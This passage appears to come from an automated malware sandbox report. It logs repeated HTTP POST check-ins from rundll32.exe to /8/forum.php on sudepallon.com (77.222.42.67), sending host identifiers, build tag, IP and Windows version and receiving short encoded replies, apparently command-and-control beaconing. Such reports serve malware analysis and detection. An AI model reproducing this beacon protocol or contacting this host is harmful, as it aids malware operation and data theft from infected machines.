                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:53.576268911 CEST3404INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 4b 50 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHKPSARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              45192.168.2.34977277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:53.631522894 CEST3413OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:53.697138071 CEST3422INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cGMNTARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              46192.168.2.34977377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:53.697603941 CEST3422OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:53.766364098 CEST3422INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 42 59 42 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cBYBYARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              47192.168.2.34977477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:53.890221119 CEST3458OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:53.956851006 CEST3459INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cZBYAARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              48192.168.2.34977577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:54.009562016 CEST3517OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.075005054 CEST3636INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 59 43 58 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cYCXBARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              49192.168.2.34977677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:54.100348949 CEST3637OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.169353008 CEST3854INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 43 58 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cNCXMARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              5192.168.2.34972477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:18.968528032 CEST668OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:19.036025047 CEST669INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:20 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 41 5a 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJAZQARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              50192.168.2.34977777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:54.278556108 CEST4169OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.345374107 CEST4564INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:55 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 46 4b 50 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cFKPUARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              51192.168.2.34977877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:54.383713961 CEST4612OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.450512886 CEST4787INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 41 5a 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cTAZGARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              52192.168.2.34977977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:54.493014097 CEST4789OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.566298008 CEST5093INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 51 4a 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMQJNARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              53192.168.2.34978077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:54.719345093 CEST5441OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.785921097 CEST5443INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 43 4d 4e 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cCMNXARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              54192.168.2.34978177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:54.912456989 CEST5449OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:54.979643106 CEST5449INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 47 48 53 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cGHSTARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              55192.168.2.34978277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:55.063107967 CEST5450OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:55.130027056 CEST5450INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 59 42 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHYBSARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              56192.168.2.34978377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:55.238332033 CEST5451OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:55.306139946 CEST5452INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 59 42 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJYBQARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              57192.168.2.34978477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:55.298197031 CEST5452OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:55.364835978 CEST5452INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:56 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQZAJARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              58192.168.2.34978577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:55.835835934 CEST5453OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:55.902894974 CEST5454INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:57 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 42 59 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQBYJARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              59192.168.2.34978677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:55.949904919 CEST5455OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:56.015496969 CEST5456INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:57 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 54 4b 50 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cTKPGARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              6192.168.2.34972677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:21.159641981 CEST670OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:21.228554964 CEST670INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:22 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 4e 4d 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
